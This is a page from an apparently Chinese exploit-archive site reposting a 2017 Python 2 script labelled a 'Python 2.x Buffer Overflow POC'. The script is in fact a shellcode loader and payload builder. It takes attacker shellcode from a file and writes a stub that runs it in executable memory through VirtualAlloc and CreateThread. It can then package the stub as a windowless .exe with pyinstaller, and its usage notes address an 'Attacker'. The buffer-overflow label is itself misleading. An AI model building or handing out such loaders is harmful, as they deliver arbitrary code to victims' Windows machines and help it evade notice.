首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Python 2.x Buffer Overflow
来源:[@bofheaded] 作者:Haritash 发布时间:2017-01-24  
#!/usr/bin/env python

###
#Exploit         : Python 2.x Buffer Overflow POC
#Tested on       : Windows XP , Windows 7
#Authors         : Sultan Albalawi & Chaitanya [@bofheaded] 
#Discovery date  : 21/jan/2017
#GitHub          : https://github.com/ChaitanyaHaritash/My-Exploits/blob/master/python2.x_bof.py
#Video 		 : https://youtu.be/hcc6Y55PWBg
#Image 		 : https://postimg.org/image/dn5x3ww9v/
###

###
# Usage ::::
###
#1. Run exploit.py
#2. Save your shellcode into some text file
#3. Input Path of text file containing shellcode
#4. The .py file will be generated with shellcode.
#5. *Optional - Attacker just need to select option 'y' in running code.. and can have .exe payload from .py code generated :)

###
# NOTE ::::
###
#pyinstaller must be installed if user wants exe payload from python payload generated initially
#This exploit is windows compatible :) 

#calc.exe shellcode =>
#http://pastebin.com/vBssgg99

import time,shutil,os,sys
if os.name == 'posix':
  print "Sorry this exploit is not compatible to linux :( "
  exit()
else:    

      banner = """
               Python 2.x Buffer Overflow POC
      Authors : Sultan Albalawi & Chaitanya [@bofheaded]
	       Susupcious Shell Activity [SSA] 
               """
      print banner
      class make:
          def __init__(self,):
                print ""
          def fii (self,):
              print ""
          if __name__ == '__main__':

                shell = str(raw_input('Input Path To Your shellcode.txt file >> '))
        
                txt = open(shell) 
                myshell = txt.read()
                raw = """
import ctypes
ban=10
for i in range(ban):
    print "|/"*i
shellcode = bytearray("""+myshell+""")
myci = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(myci),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(myci),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
                """

                f = open ('stub.py' , 'w')
                f.write(raw)
                f.close()
                print "done !"
                
                build_exe = str(raw_input('Would You like to have an executable payload ? (y|n)>> '))  
                if build_exe == 'y':
                    os.system('C:\Python27\Scripts\pyinstaller --noconsole --onefile stub.py')
                    print "Please Wait ...."
                    time.sleep(2)
                else:
                    print ('byee')        
                  
      make()         

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PageKit 1.0.10 - Password Rese
·Microsoft Remote Desktop Clien
·DiskSavvy Enterprise 9.1.14 /
·Oracle OpenJDK Runtime Environ
·SunOS 5.11 Remote ICMP Weaknes
·Firefox nsSMILTimeContainer::N
·Pirelli DRG A115 v3 ADSL Route
·Cisco WebEx - 'nativeMessaging
·Tenda ADSL2/2+ Modem D820R - U
·Geutebrueck GCore 1.3.8.42/1.4
·SentryHD 02.01.12e - Privilege
·GNU Screen 4.5.0 - Privilege E
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved